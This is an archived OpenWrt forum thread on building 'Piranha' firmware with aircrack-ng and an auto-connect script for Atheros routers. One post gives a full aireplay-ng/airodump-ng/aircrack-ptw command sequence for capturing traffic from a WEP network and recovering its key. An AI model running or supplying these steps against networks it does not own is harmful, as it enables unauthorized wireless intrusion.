OpenWrt Forum Archive

Topic: Atheros only! - Next Generation Piranha firmware (v4) + AAP (v3)

The content of this topic has been archived between 20 Aug 2015 and 21 Apr 2018. Unfortunately there are posts – most likely complete pages – missing.

I decided to create an updated version of Piranha based on OpenWRT 10.03.1 and orange's updated aap script from post #216.  I have it working by doing the following:
1) Install OpenWRT 10.03.1
2) Install the following packages:

aircrack-ng:        root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
aircrack-ptw:        root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
zlib:                    root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libpthread:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libopenssl:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libpcap:                root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
kmod-tun:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libreadline:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libncurses:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
cifsmount:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
macchanger:        root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
kmod-nls-base:    root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
kmod-fs-cifs:        root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
screen:                root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk

3)  Create the following monitor and sta scripts and chmod 755 both scripts.
-----------------------
/bin/monitor :
-----------------------
#!/bin/sh
ifconfig -a | awk '/ath/ {print $1}' | while read x; do wlanconfig $x destroy; echo "madwifi-ng VAP $x destroyed"; done
wlanconfig ath0 create wlandev wifi0 wlanmode monitor > /dev/null
echo "madwifi-ng VAP ath0 created (wlanmode monitor)"

-----------------------
/bin/sta :
-----------------------
#!/bin/sh
ifconfig -a | awk '/ath/ {print $1}' | while read x; do wlanconfig $x destroy; echo "madwifi-ng VAP $x destroyed"; done
wlanconfig ath0 create wlandev wifi0 wlanmode sta > /dev/null
echo "madwifi-ng VAP ath0 created (wlanmode sta)"

4)  Follow orange's instructions in his now infamous post #216.  This will add the last published aap script from orange, its configuration file, and the original Piranha network and wireless configurations.  After editing the network and wireless config files and rebooting, your router will behave like Piranha v4.
https://forum.openwrt.org/viewtopic.php … 97#p140797

So far I have tested the aap, monitor & sta scripts and monitor mode for scanning only.  I haven't tried packet injection or capture yet.

(Last edited by technocrat on 12 Feb 2012, 16:43)

Right on ....

technocrat wrote:

I decided to create an updated version of Piranha based on OpenWRT 10.03.1 and orange's updated aap script from post #216.  I have it working by doing the following:
1) Install OpenWRT 10.03.1
2) Install the following packages:

aircrack-ng:        root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
aircrack-ptw:        root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
zlib:                    root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libpthread:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libopenssl:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libpcap:                root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
kmod-tun:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libreadline:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libncurses:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
cifsmount:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
macchanger:        root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
kmod-nls-base:    root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
kmod-fs-cifs:        root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
screen:                root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk

3)  Create the following monitor and sta scripts and chmod 755 both scripts.
-----------------------
/bin/monitor :
-----------------------
#!/bin/sh
ifconfig -a | awk '/ath/ {print $1}' | while read x; do wlanconfig $x destroy; echo "madwifi-ng VAP $x destroyed"; done
wlanconfig ath0 create wlandev wifi0 wlanmode monitor > /dev/null
echo "madwifi-ng VAP ath0 created (wlanmode monitor)"

-----------------------
/bin/sta :
-----------------------
#!/bin/sh
ifconfig -a | awk '/ath/ {print $1}' | while read x; do wlanconfig $x destroy; echo "madwifi-ng VAP $x destroyed"; done
wlanconfig ath0 create wlandev wifi0 wlanmode sta > /dev/null
echo "madwifi-ng VAP ath0 created (wlanmode sta)"

4)  Follow orange's instructions in his now infamous post #216.  This will add the last published aap script from orange, its configuration file, and the original Piranha network and wireless configurations.  After editing the network and wireless config files and rebooting, your router will behave like Piranha v4.
https://forum.openwrt.org/viewtopic.php … 97#p140797

So far I have tested the aap, monitor & sta scripts and monitor mode for scanning only.  I haven't tried packet injection or capture yet.

Thank you very much for this update.

Let us know how the testing goes with injection and capture. Are you able to defeat WEP as quickly as on a normal PC ( experimenting on your own devices of course ) ?

I am using a wndr3700 and would like to be able to get aap to work on it. How close is V4?
I appreciate the effort you guys have put into this project. Keep up the great work.

I found this command to test injection.  Here is my result:

root@OpenWrt:~# aireplay-ng -9 ath0
10:23:02  Trying broadcast probe requests...
10:23:02  Injection is working!
10:23:04  Found 4 APs

I am still working on the WEP test.

I have some questions for you technocrat :

-is the CPU of the device powerful enough to hack the WEP algorithm or do you need to use a desktop for that ?

-is there enough local storage for the packets or do you need to use a network HDD for storage ?

-do you need to use screen for multiple commands at the same time in the terminal ?

-do you need to use the aircrack-ng function of emulating the wireless adapter over TCP / IP ( passthrough function of airserv-ng ) ?

Thanks and please report on your progress. This is very interesting !

-is the CPU of the device powerful enough to hack the WEP algorithm or do you need to use a desktop for that ?

A desktop CPU certainly is much more powerful, but it works. I'd recommend to use aircrack-ptw instead of aircrack-ng (crashes less frequently)

-is there enough local storage for the packets or do you need to use a network HDD for storage ?

There isn't enough space. Use CIFS storage for capturing.

-do you need to use screen for multiple commands at the same time in the terminal ?

Yes. Otherwise you need to open several SSH sessions. Using screen you can even detach the session.

-do you need to use the aircrack-ng function of emulating the wireless adapter over TCP / IP ( passthrough function of airserv-ng ) ?

Nope. The router is self-sustaining, i.e. at least capable to do it without the desktop but CIFS storage. You may use airserv-ng though. You need kmod-tun afaik.

xadonxander wrote:

I am using a wndr3700 and would like to be able to get aap to work on it. How close is V4?
I appreciate the effort you guys have put into this project. Keep up the great work.

WNDR3700 is ath9k, i.e. mac80211 or what is it? If so, you'll need to wait for next AAP. AAP v3 is madwifi-ng only. I'm working (behind the scenes so to speak) on "mac80211-AAP" (this will solve many problems, e.g. no more patching, truncated SSIDs, etc.) but I won't promise ETAs etc. Have done this in the past without actually delivering due to "too much on the plate".

(Last edited by orange on 24 Feb 2012, 17:04)

I have done this with Piranha on the Fon 2100 (original).  You need to open two ssh sessions to the router and issue the commands.  The instructions I read online a while back stated that you need to collect about 60000 packets, so I use that as a rough guide.  I noticed my capture file was about 2-3MB with about that many packets.  If you have enough space on your router, you can use it for storage.  Otherwise see below on how to mount a network share (I used a windows 7 share)

I am not sure what screen does :-)  I did a package compare between a Fon 2100 Piranha v4 and my base EOC-5610 OpenWRT 10.03.1 install and installed the missing packages that I listed in a post #251. 

The commands I used are listed below.  You may want to cross reference this with another tutorial.  I am fairly new to aircrack-ng and can't use it robustly yet.

ssh 10.0.0.1

mkdir /mnt/share
mount.cifs //10.0.0.133/share /tmp/share -o user=username

aap stop
monitor         (to put the router in monitor mode)

// use the -c to specify channel #
airodump-ng -c 6 --bssid <MAC.Address.of.WEP.network> -w /mnt/share/capture ath0

ssh 10.00.221 -l root          (open another ssh session in a new window)
ifconfig                              (find and copy the MAC address of ath0)
aireplay-ng -1 0 -e <ESSID.of.WEP.network> -a <MAC.Address.of.WEP.network> -h <MAC.Address.of.ath0> ath0

aireplay-ng -3  -b  <MAC.Address.of.WEP.network> -h  <MAC.Address.of.ath0> ath0

After you collect enough packets run the aircrack-ptw to see if it can discover the key.
aircrack-ptw /mnt/share/capture-01.cap

(Last edited by technocrat on 24 Feb 2012, 20:29)

technocrat wrote:

I am not sure what screen does :-)

There is a brief writeup about GNU screen (that pretty much explains it) at https://www.linux.com/learn/tutorials/2 … gnu-screen-
The session-detach is particularly useful.

(Last edited by orange on 24 Feb 2012, 23:00)

orange wrote:
xadonxander wrote:

I am using a wndr3700 and would like to be able to get aap to work on it. How close is V4?
I appreciate the effort you guys have put into this project. Keep up the great work.

WNDR3700 is ath9k, i.e. mac80211 or what is it? If so, you'll need to wait for next AAP. AAP v3 is madwifi-ng only. I'm working (behind the scenes so to speak) on "mac80211-AAP" (this will solve many problems, e.g. no more patching, truncated SSIDs, etc.) but I won't promise ETAs etc. Have done this in the past without actually delivering due to "too much on the plate".

I wasn't looking for and exact date just a round about time. It is a mac80211. I don't mess with the routers too much, I stick to pic based devices most of the time so I don't know the amount of work involved.  Are we close, weeks, months or years from this being possible? I'm just trying to decide to wait it out or buy a new router.

I did get the magicconnect script to work which is OK as I don't need to crack WEP. It has its limitations and I have not figured out how to only use radio0 for the client and radio1 for AP.

Thank you, Keep up the great work! 
Brandon

(Last edited by xadonxander on 25 Feb 2012, 08:19)

technocrat wrote:

I decided to create an updated version of Piranha based on OpenWRT 10.03.1 and orange's updated aap script from post #216.  I have it working by doing the following:
1) Install OpenWRT 10.03.1
2) Install the following packages:

aircrack-ng:        root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
aircrack-ptw:        root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
zlib:                    root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libpthread:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libopenssl:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libpcap:                root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
kmod-tun:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libreadline:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libncurses:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
cifsmount:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
macchanger:        root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
kmod-nls-base:    root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
kmod-fs-cifs:        root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
screen:                root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk

3)  Create the following monitor and sta scripts and chmod 755 both scripts.
-----------------------
/bin/monitor :
-----------------------
#!/bin/sh
ifconfig -a | awk '/ath/ {print $1}' | while read x; do wlanconfig $x destroy; echo "madwifi-ng VAP $x destroyed"; done
wlanconfig ath0 create wlandev wifi0 wlanmode monitor > /dev/null
echo "madwifi-ng VAP ath0 created (wlanmode monitor)"

-----------------------
/bin/sta :
-----------------------
#!/bin/sh
ifconfig -a | awk '/ath/ {print $1}' | while read x; do wlanconfig $x destroy; echo "madwifi-ng VAP $x destroyed"; done
wlanconfig ath0 create wlandev wifi0 wlanmode sta > /dev/null
echo "madwifi-ng VAP ath0 created (wlanmode sta)"

4)  Follow orange's instructions in his now infamous post #216.  This will add the last published aap script from orange, its configuration file, and the original Piranha network and wireless configurations.  After editing the network and wireless config files and rebooting, your router will behave like Piranha v4.
https://forum.openwrt.org/viewtopic.php … 97#p140797

So far I have tested the aap, monitor & sta scripts and monitor mode for scanning only.  I haven't tried packet injection or capture yet.

opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/zlib_1.2.3-5_atheros.ipk
[b]opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/librt_0.9.30.1-43.32_atheros.ipk[/b]
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/libpthread_0.9.30.1-43.32_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/libopenssl_0.9.8r-1_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/libpcap_1.0.0-2_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/aircrack-ng_1.1-3_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/aircrack-ptw_1.0.0-1_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/kmod-tun_2.6.30.10-1_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/libreadline_5.2-2_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/libncurses_5.7-2_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/cifsmount_1.5-2_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/macchanger_1.5.0-1_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/kmod-nls-base_2.6.30.10-1_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/kmod-fs-cifs_2.6.30.10-1_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/screen_4.0.3-2_atheros.ipk

I had to install a dependency for libpthread

Does the setup need external root or is the NAND big enough.

Might be an idea to put the captures on exroot ?

I couldn't get this to work correctly with a vap on my fonera. Borg box worked for a second but it would randomly reboot.

r3dsk1n wrote:

I couldn't get this to work correctly with a vap on my fonera. Borg box worked for a second but it would randomly reboot.

Which version of the fon was this on ?

Thanks !

2100

Has anyone thought about using a simple form of WAN failover on this firmware ?

Maybe switch between different APs when one does not ping through etc. ?

bulanula wrote:

Has anyone thought about using a simple form of WAN failover on this firmware ?

Maybe switch between different APs when one does not ping through etc. ?

?? Maybe I don't understand your question, but what you're requesting actually is THE fundamental functionality of AAP *confused*, i.e. the reason it's there.

orange wrote:
bulanula wrote:

Has anyone thought about using a simple form of WAN failover on this firmware ?

Maybe switch between different APs when one does not ping through etc. ?

?? Maybe I don't understand your question, but what you're requesting actually is THE fundamental functionality of AAP *confused*, i.e. the reason it's there.

I was asking about a form of this software here : http://eko.one.pl/?p=openwrt-simplefailover

But it must do this with gateways on the LAN and also wireless AP gateways.

Basically, the AAP does this only with the wireless interfaces but can you somehow do it with all 3 maybe :

-wireless
-3g modem
-wired

for ultimate redundancy solution ?

Thank you !

r3dsk1n wrote:
technocrat wrote:

I decided to create an updated version of Piranha based on OpenWRT 10.03.1 and orange's updated aap script from post #216.  I have it working by doing the following:
1) Install OpenWRT 10.03.1
2) Install the following packages:

aircrack-ng:        root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
aircrack-ptw:        root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
zlib:                    root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libpthread:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libopenssl:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libpcap:                root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
kmod-tun:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libreadline:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libncurses:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
cifsmount:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
macchanger:        root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
kmod-nls-base:    root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
kmod-fs-cifs:        root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
screen:                root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk

3)  Create the following monitor and sta scripts and chmod 755 both scripts.
-----------------------
/bin/monitor :
-----------------------
#!/bin/sh
ifconfig -a | awk '/ath/ {print $1}' | while read x; do wlanconfig $x destroy; echo "madwifi-ng VAP $x destroyed"; done
wlanconfig ath0 create wlandev wifi0 wlanmode monitor > /dev/null
echo "madwifi-ng VAP ath0 created (wlanmode monitor)"

-----------------------
/bin/sta :
-----------------------
#!/bin/sh
ifconfig -a | awk '/ath/ {print $1}' | while read x; do wlanconfig $x destroy; echo "madwifi-ng VAP $x destroyed"; done
wlanconfig ath0 create wlandev wifi0 wlanmode sta > /dev/null
echo "madwifi-ng VAP ath0 created (wlanmode sta)"

4)  Follow orange's instructions in his now infamous post #216.  This will add the last published aap script from orange, its configuration file, and the original Piranha network and wireless configurations.  After editing the network and wireless config files and rebooting, your router will behave like Piranha v4.
https://forum.openwrt.org/viewtopic.php … 97#p140797

So far I have tested the aap, monitor & sta scripts and monitor mode for scanning only.  I haven't tried packet injection or capture yet.

opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/zlib_1.2.3-5_atheros.ipk
[b]opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/librt_0.9.30.1-43.32_atheros.ipk[/b]
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/libpthread_0.9.30.1-43.32_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/libopenssl_0.9.8r-1_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/libpcap_1.0.0-2_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/aircrack-ng_1.1-3_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/aircrack-ptw_1.0.0-1_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/kmod-tun_2.6.30.10-1_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/libreadline_5.2-2_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/libncurses_5.7-2_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/cifsmount_1.5-2_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/macchanger_1.5.0-1_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/kmod-nls-base_2.6.30.10-1_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/kmod-fs-cifs_2.6.30.10-1_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/screen_4.0.3-2_atheros.ipk

I had to install a dependency for libpthread

Feel like pulling an image off of the 2100 after it was all installed .... not sure if that's even possible ..

Indeed. I too was wondering if you can somehow "clone" the current installed image to a new image that you can flash on another similar device for backup purposes or easier initialization ???

Thanks !

(Last edited by bulanula on 5 Apr 2012, 12:47)

You could use the openwrt source to build an image with all the needed packages and scripts. I might actually do that myself considering i have been looking for something like piranha for the past 2 days smile

orange: Would you mind me building a backfire 10.03.1 version of piranha based on the details provided by technocrat?

Would you have a place to host it?

That was weird ... got an email that there was a new posting ... but nothing new ...

Seth7: i do have a place to host it.

Hopefully ill be able to test the image i made tonight. If it works all we need is an OK from orange.